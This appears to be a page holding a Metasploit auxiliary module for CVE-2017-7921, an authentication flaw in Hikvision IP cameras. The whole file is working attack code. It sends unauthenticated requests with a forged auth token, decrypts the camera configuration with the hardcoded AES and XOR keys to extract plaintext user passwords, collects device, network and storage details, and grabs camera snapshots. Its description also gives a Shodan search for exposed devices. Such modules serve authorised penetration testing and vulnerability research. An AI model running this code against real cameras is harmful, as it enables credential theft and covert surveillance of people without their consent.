Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-HIKVISION_INFO_DISCLOSURE_CVE_2017_7921-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  require 'openssl'

  prepend Msf::Exploit::Remote::AutoCheck

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # AES hex encryption key and XOR key defined constants used to decrypt the camare configuration file
  AES_KEY = '279977f62f6cfd2d91cd75b889ce0c9a'.freeze
  XOR_KEY = "\x73\x8b\x55\x44".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera',
        'Description' => %q{
          Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information,
          such as detailed hardware and software configuration, user credentials, and camera snapshots.
          The vulnerability has been present in Hikvision products since 2014.
          In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
          Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: "App-webs" "200 OK").
          This module allows the attacker to retrieve this information without any authentication. The information is stored in loot for future use.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Monte Crypto', # Researcher who discovered and disclosed this vulnerability
          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Developer and author of this Metasploit module
        ],
        'References' => [
          [ 'CVE', '2017-7921' ],
          [ 'PACKETSTORM', '144097' ],
          [ 'URL', 'https://ipvm.com/reports/hik-exploit' ],
          [ 'URL', 'https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
        ],
        'Actions' => [
          ['Automatic', { 'Description' => 'Dump all information' }],
          ['Credentials', { 'Description' => 'Dump all credentials and passwords' }],
          ['Configuration', { 'Description' => 'Dump camera hardware and software configuration' }],
          ['Snapshot', { 'Description' => 'Take a camera snapshot' }]
        ],
        'DefaultAction' => 'Automatic',
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'DisclosureDate' => '2017-09-23',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptBool.new(
        'PRINT',
        [
          false,
          'Print output to console (not applicable for snapshot)',
          true
        ]
      )
    ])
  end

  def get_info(uri)
    password = Rex::Text.rand_text_alphanumeric(4..12)
    auth = Base64.urlsafe_encode64("admin:#{password}", padding: false)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'vars_get' => {
        'auth' => auth.strip
      }
    })
    return res
  rescue StandardError => e
    print_error("#{peer} - Communication error occurred: #{e.message}")
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    return nil
  end

  def report_creds(user, pwd)
    credential_data = {
      module_fullname: fullname,
      username: user,
      private_data: pwd,
      private_type: :password,
      workspace_id: myworkspace_id,
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_details)

    cred_res = create_credential_and_login(credential_data)
    unless cred_res.nil?
      print_status("Credentials for user:#{user} are added to the database...")
    end
  end

  def decrypt_config
    text_data = []

    # Get AES128-ECB encrypted camera configuration file with user and password information
    uri = normalize_uri(target_uri.path, 'System', 'configurationFile')
    aes_data = get_info(uri)

    if aes_data.nil?
      print_error('Target server did not respond to the configuration file download request.')
    elsif aes_data.code == 200
      # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
      decipher = OpenSSL::Cipher.new('aes-128-ecb')
      decipher.decrypt
      decipher.key = [AES_KEY].pack('H*') # transform hex key to 16 bits key
      xor_data = decipher.update(aes_data.body) + decipher.final

      # decode the AES decrypted configuration file data with xor key: 73 8B 55 44
      file_data = Rex::Text.xor(XOR_KEY.b, xor_data)

      # extract text chunks with regular expression below...
      text_data = file_data.scan(%r{[0-9A-Za-z_\#~`@|\\/=*\^:"'.;{}?\-+&!$%()\[\]<>]+}x)
    end
    return text_data
  end

  def get_creds
    loot_data = ''
    pwd = nil

    print_status('Getting the user credentials...')
    uri = normalize_uri(target_uri.path, 'Security', 'users')
    creds_info = get_info(uri)

    if creds_info.nil?
      print_error('Target server did not respond to the credentials request.')
    elsif creds_info.code == 200
      # process XML output and store output in loot_data
      xml_creds_info = creds_info.get_xml_document
      if xml_creds_info.blank?
        print_error('No users were found in the returned CSS code!')
      else
        # Download camera configuration file and and decrypt
        text_data = decrypt_config
        loot_data << "User Credentials Information:\n"
        loot_data << "-----------------------------\n"
        xml_creds_info.css('User').each do |user|
          unless text_data.empty?
            # Filter out password based on user name and store credentials in the database
            i = text_data.each_with_index.select { |text_chunk, _index| text_chunk == user.at_css('userName').content }.map { |pair| pair[1] }
            if i.empty?
              print_error("Could not retrieve password for user:#{user.at_css('userName').content} from the camera configuration file!")
            else
              pwd = text_data[i.last + 1]
              report_creds(user.at_css('userName').content, pwd)
            end
          end
          loot_data << "User:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | Role:#{user.at_css('userLevel').content} | Password: #{pwd}\n"
        end
      end
    else
      print_error('Response code invalid for obtaining the user credentials.')
    end
    unless loot_data.empty?
      if datastore['PRINT']
        print_status(loot_data.to_s)
      end
      loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], loot_data, 'credentials', 'leaked credentials')
      print_good("User credentials are successfully saved to #{loot_path}")
    end
  end

  def get_config
    loot_data = ''

    # Get device info
    print_status('Getting the camera hardware and software configuration...')
    uri = normalize_uri(target_uri.path, 'System', 'deviceInfo')
    device_info = get_info(uri)

    if device_info.nil?
      print_error('Target server did not respond to the device info request.')
    elsif device_info.code == 200
      # process XML output and store in loot_data
      xml_device_info = device_info.get_xml_document
      if xml_device_info.blank?
        print_error('No device info was found in the returned CSS code!')
      else
        loot_data << "Camera Device Information:\n"
        loot_data << "--------------------------\n"
        xml_device_info.css('DeviceInfo').each do |device|
          loot_data << "Device name: #{device.at_css('deviceName').content}\n"
          loot_data << "Device ID: #{device.at_css('deviceID').content}\n"
          loot_data << "Device description: #{device.at_css('deviceDescription').content}\n"
          loot_data << "Device manufacturer: #{device.at_css('systemContact').content}\n"
          loot_data << "Device model: #{device.at_css('model').content}\n"
          loot_data << "Device S/N: #{device.at_css('serialNumber').content}\n"
          loot_data << "Device MAC: #{device.at_css('macAddress').content}\n"
          loot_data << "Device firware version: #{device.at_css('firmwareVersion').content}\n"
          loot_data << "Device firmware release: #{device.at_css('firmwareReleasedDate').content}\n"
          loot_data << "Device boot version: #{device.at_css('bootVersion').content}\n"
          loot_data << "Device boot release: #{device.at_css('bootReleasedDate').content}\n"
          loot_data << "Device hardware version: #{device.at_css('hardwareVersion').content}\n"
        end
        loot_data << "\n"
      end
    else
      print_error('Response code invalid for obtaining camera hardware and software configuration.')
    end

    # Get network configuration
    uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
    network_info = get_info(uri)

    if network_info.nil?
      print_error('Target server did not respond to the network info request.')
    elsif network_info.code == 200
      # process XML output and store in loot_data
      xml_network_info = network_info.get_xml_document
      if xml_network_info.blank?
        print_error('No network info was found in the returned CSS code!')
      else
        loot_data << "Camera Network Information:\n"
        loot_data << "---------------------------\n"
        xml_network_info.css('NetworkInterface').each do |interface|
          loot_data << "IP interface: #{interface.at_css('id').content}\n"
          xml_network_info.css('IPAddress').each do |ip|
            loot_data << "IP version: #{ip.at_css('ipVersion').content}\n"
            loot_data << "IP assignment: #{ip.at_css('addressingType').content}\n"
            loot_data << "IP address: #{ip.at_css('ipAddress').content}\n"
            loot_data << "IP subnet mask: #{ip.at_css('subnetMask').content}\n"
            xml_network_info.css('DefaultGateway').each do |gateway|
              loot_data << "Default gateway: #{gateway.at_css('ipAddress').content}\n"
            end
            xml_network_info.css('PrimaryDNS').each do |dns|
              loot_data << "Primary DNS: #{dns.at_css('ipAddress').content}\n"
            end
          end
        end
        loot_data << "\n"
      end
    else
      print_error('Response code invalid for obtaining camera network configuration.')
    end

    # Get storage configuration
    uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
    storage_info = get_info(uri)

    if storage_info.nil?
      print_error('Target server did not respond to the storage info request.')
    elsif storage_info.code == 200
      # process XML output and store in loot
      xml_storage_info = storage_info.get_xml_document
      if xml_storage_info.blank?
        print_error('No storage info was found in the returned CSS code!')
      else
        loot_data << "Camera Storage Information:\n"
        loot_data << "---------------------------\n"
        xml_storage_info.css('StorageVolume').each do |volume|
          loot_data << "Storage volume name: #{volume.at_css('volumeName').content}\n"
          loot_data << "Storage volume ID: #{volume.at_css('id').content}\n"
          loot_data << "Storage volume description: #{volume.at_css('storageDescription').content}\n"
          loot_data << "Storage device: #{volume.at_css('storageLocation').content}\n"
          loot_data << "Storage type: #{volume.at_css('storageType').content}\n"
          loot_data << "Storage capacity (MB): #{volume.at_css('capacity').content}\n"
          loot_data << "Storage device status: #{volume.at_css('status').content}\n"
        end
      end
    else
      print_error('Response code invalid for obtaining camera storage configuration.')
    end
    unless loot_data.empty?
      if datastore['PRINT']
        print_status(loot_data.to_s)
      end
      loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], loot_data, 'configuration', 'camera configuration')
      print_good("Camera configuration details are successfully saved to #{loot_path}")
    end
  end

  def take_snapshot
    jpeg_image = nil

    # Take a snapshot and store as jpeg
    print_status('Taking a camera snapshot...')
    uri = normalize_uri(target_uri.path, 'Streaming', 'channels', '1', 'picture?snapShotImageType=JPEG')
    res = get_info(uri)

    if res.nil?
      print_error('Target server did not respond to the snapshot request.')
    elsif res.code == 200
      jpeg_image = res.body
    else
      print_error('Response code invalid for obtaining a camera snapshot.')
    end
    unless jpeg_image.nil?
      loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], jpeg_image, 'snapshot', 'camera snapshot')
      print_good("Camera snapshot is successfully saved to #{loot_path}")
    end
  end

  def check
    uri = normalize_uri(target_uri.path, 'System', 'time')
    res = get_info(uri)

    if res.nil?
      return Exploit::CheckCode::Unknown
    elsif res.code == 200
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def run
    case action.name
    when 'Automatic'
      print_status('Running in automatic mode')
      get_creds
      get_config
      take_snapshot
    when 'Credentials'
      get_creds
    when 'Configuration'
      get_config
    when 'Snapshot'
      take_snapshot
    end
  end
end